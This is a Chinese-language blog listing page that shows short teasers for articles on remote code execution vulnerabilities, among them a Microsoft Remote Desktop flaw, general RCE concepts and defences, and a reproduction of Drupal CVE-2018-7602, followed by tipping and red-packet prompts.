  • 微軟遠(yuǎn)程桌面服務(wù)遠(yuǎn)程代碼執(zhí)行漏洞

    微軟遠(yuǎn)程桌面服務(wù)遠(yuǎn)程代碼執(zhí)行漏洞

    人和管理成為主要入侵突破口 安全需要人、技術(shù)、管理的全方位保障,然而人與管理由于其復(fù)雜性,常常成為入侵突破口。在 19 年處理的安全事件中,弱口令事件占比 22%,釣魚郵件相關(guān)事件占比 7%,配置不當(dāng)事件占比 3%, 與人和管理相關(guān)的事件合計(jì)占總數(shù)的 1/3,安全管理

    2024年02月13日
    瀏覽(26)
  • RCE 遠(yuǎn)程代碼執(zhí)行漏洞分析

    RCE 遠(yuǎn)程代碼執(zhí)行漏洞分析

    Remote Command/Code Execute 遠(yuǎn)程命令執(zhí)行/遠(yuǎn)程代碼執(zhí)行漏洞 這種漏洞通常出現(xiàn)在應(yīng)用程序或操作系統(tǒng)中,攻擊者可以通過利用漏洞注入惡意代碼,并在受攻擊的系統(tǒng)上執(zhí)行任意命令。 PHP 代碼執(zhí)行 PHP 代碼注入 OS 命令執(zhí)行 OS 命令注入 Java、Python…… Web 應(yīng)用程序 遠(yuǎn)程服務(wù) 操作系統(tǒng)

    2024年02月08日
    瀏覽(30)
  • 遠(yuǎn)程代碼執(zhí)行漏洞的利用與防御

    遠(yuǎn)程代碼執(zhí)行漏洞的利用與防御

    全稱:remote command/code execute 分為遠(yuǎn)程命令執(zhí)行和遠(yuǎn)程代碼執(zhí)行 1.命令執(zhí)行漏洞: 直接調(diào)用操作系統(tǒng)命令 2.代碼執(zhí)行漏洞: 靠執(zhí)行腳本代碼調(diào)用操作系統(tǒng)命令 一般出現(xiàn)這種漏洞,是因?yàn)閼?yīng)用系統(tǒng)從設(shè)計(jì)上需要給用戶提供指定的遠(yuǎn)程命令操作的接口,比如我們常見的路由器、防

    2024年02月15日
    瀏覽(29)
  • 漏洞復(fù)現(xiàn)-Drupal遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2018-7602)

    漏洞復(fù)現(xiàn)-Drupal遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2018-7602)

    Drupal 7.x 和 8.x 的多個(gè)子系統(tǒng)中存在一個(gè)遠(yuǎn)程執(zhí)行代碼漏洞。這可能允許攻擊者利用 Drupal 站點(diǎn)上的多個(gè)攻擊媒介,從而導(dǎo)致該站點(diǎn)受到威脅。此漏洞與 Drupal 核心 - 高度關(guān)鍵 - 遠(yuǎn)程代碼執(zhí)行 - SA-CORE-2018-002 有關(guān)。SA-CORE-2018-002 和此漏洞都在野外被利用。 -c 后面接命令,緊隨賬號(hào)

    2024年02月16日
    瀏覽(23)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包